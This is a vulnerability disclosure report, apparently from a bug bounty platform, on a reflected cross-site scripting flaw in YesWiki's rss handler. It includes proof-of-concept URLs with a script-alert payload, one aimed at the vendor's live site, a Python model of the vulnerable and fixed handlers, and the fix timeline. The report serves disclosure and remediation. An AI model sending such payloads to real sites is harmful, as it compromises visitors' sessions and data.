Unauthenticated Cross Site Scripting - Reflected in yeswiki/yeswiki

Valid

Reported on

Jul 27th 2022


Description


Proof of Concept

XSS PoC:

Local host:
http://192.168.0.109:81/?PagePrincipale/rss&id=1%27%3Cscript%3Ealert(1122)%3C/script%3E

Vendor domain:
https://yeswiki.net/?AccueiL/rss&id=1%27%3Cscript%3Ealert(1122)%3C/script%3E

Attached PoC images: screenshots of the alert on the vendor domain and on the local host (images not reproduced in this text).

Impact

If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:

Perform any action within the application that the user can perform. View any information that the user is able to view. Modify any information that the user is able to modify. Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.

Occurrences

Don't Know :)
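The report shows the reflection but not the mechanism, so the following added example (mine, not YesWiki's code and not the fix from commit fd59bc) models it: the `id` parameter of the `rss` handler is decoded from the PoC URLs quoted above, echoed raw by a hypothetical vulnerable handler, and then handled by a hardened version that allow-lists `id` as an integer and HTML-encodes anything it echoes, including the error path. The handler names, the feed layout and the error message are assumptions for illustration; only the URLs and the `alert(1122)` payload come from the report.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# PoC URLs quoted from the report (local test host and vendor demo site).
POC_LOCAL = "http://192.168.0.109:81/?PagePrincipale/rss&id=1%27%3Cscript%3Ealert(1122)%3C/script%3E"
POC_VENDOR = "https://yeswiki.net/?AccueiL/rss&id=1%27%3Cscript%3Ealert(1122)%3C/script%3E"

# Decoded payload fragment whose verbatim presence proves unescaped reflection.
MARKER = "<script>alert(1122)</script>"


def extract_id(url: str) -> str:
    """Return the URL-decoded `id` parameter from a YesWiki-style URL.

    YesWiki routes as `?Page/handler&key=value`, so the first query segment
    ('PagePrincipale/rss') has no '=' and is kept as a blank-value key.
    """
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("id", [""])[0]


def render_rss_vulnerable(page: str, id_param: str) -> str:
    """Hypothetical handler that interpolates the raw parameter into the body.

    Assumed pattern for illustration, not YesWiki's RssHandler.php.
    """
    return (
        '<?xml version="1.0"?><rss version="2.0"><channel>'
        f"<title>{page}</title>"
        f"<description>Feed for {page}, id={id_param}</description>"
        "</channel></rss>"
    )


def validate_id(id_param: str):
    """Allow-list the parameter: only a plain non-negative integer is accepted."""
    return int(id_param) if re.fullmatch(r"[0-9]+", id_param) else None


def render_rss_fixed(page: str, id_param: str) -> str:
    """Hardened handler: reject non-numeric ids and encode everything echoed.

    The error path also encodes the input, because error messages are the
    classic place where a "rejected" value still gets reflected.
    """
    feed_id = validate_id(id_param)
    if feed_id is None:
        return f"<error>Invalid id: {html.escape(id_param, quote=True)}</error>"
    safe_page = html.escape(page, quote=True)
    return (
        '<?xml version="1.0"?><rss version="2.0"><channel>'
        f"<title>{safe_page}</title>"
        f"<description>Feed for {safe_page}, id={feed_id}</description>"
        "</channel></rss>"
    )


def reproduce(url: str, handler) -> str:
    """Drive a handler with the page and id taken from a PoC URL."""
    query = urlsplit(url).query
    page = query.split("&", 1)[0].split("/", 1)[0]   # 'PagePrincipale' / 'AccueiL'
    return handler(page, extract_id(url))


def reflected_unescaped(body: str) -> bool:
    """Reproduction check: does the decoded payload appear verbatim in the response?"""
    return MARKER in body


if __name__ == "__main__":
    for name, handler in (("vulnerable", render_rss_vulnerable), ("fixed", render_rss_fixed)):
        body = reproduce(POC_LOCAL, handler)
        print(f"{name}: reflected unescaped = {reflected_unescaped(body)}")
        print("   ", body)
```

`reflected_unescaped` is the same check a tester runs against the real endpoint: fetch the PoC URL and look for the decoded `<script>alert(1122)</script>` in the body rather than trusting the browser alert. `html.escape` is the right encoder for an XML or HTML text node; a value placed in another context (attribute, URL, JavaScript) needs that context's encoder. Whether the project chose validation, encoding or both is visible in the fix commit referenced below, not in this example.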

We are processing your report and will contact the yeswiki team within 24 hours. a year ago
We have contacted a member of the yeswiki team and are waiting to hear back a year ago
We have sent a follow up to the yeswiki team. We will try again in 7 days. a year ago
Jérémy Dufraisse validated this vulnerability a year ago
AggressiveUser has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
AggressiveUser
a year ago

Researcher


Hi @maintainer, Please allow @admin to assign CVE ID on this report after fix.

We have sent a fix follow up to the yeswiki team. We will try again in 7 days. a year ago
Jérémy Dufraisse marked this as fixed in 4.2.3 with commit fd59bc a year ago
Jérémy Dufraisse has been awarded the fix bounty
This vulnerability will not receive a CVE
RssHandler.php#L19 has been validated
AggressiveUser
a year ago

Researcher


Dear @maintainer / @admin , can i have CVE for this report ?

Jamie Slome
a year ago

Admin


Happy to assign a CVE once we get the go-ahead from the maintainer 👍

AggressiveUser
a year ago

Researcher


@maintainer Please help us out with this :)
